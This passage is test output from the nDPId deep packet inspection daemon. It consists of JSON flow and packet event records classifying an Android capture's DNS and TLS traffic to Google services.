01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454868503,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1582454868503,"pkt":"TGr2n\/YnxiwDYGpkCABFAABbmZAAAEARW6DAqAIBwKgCEAA1t+kAR93wnJ6BgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAHADAABAAEAAACxAASs2RID"}
00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454868597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454868597,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBqkFAAEARCwnAqAIQwKgCAcjmADUALYwU2tsBAAABAAAAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAQ=="}
00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454868597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454868597,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRZjUAAEARjwXAqAIBwKgCEAA1yOYAPQ9d2tuBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAAEEABKzZqM4="}
00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}}
00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}}
00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}}
00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454868606,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1582454868606,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454869361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454869361,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qnVAAEARCtjAqAIQwKgCAZhgADUAKv996DEBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="}
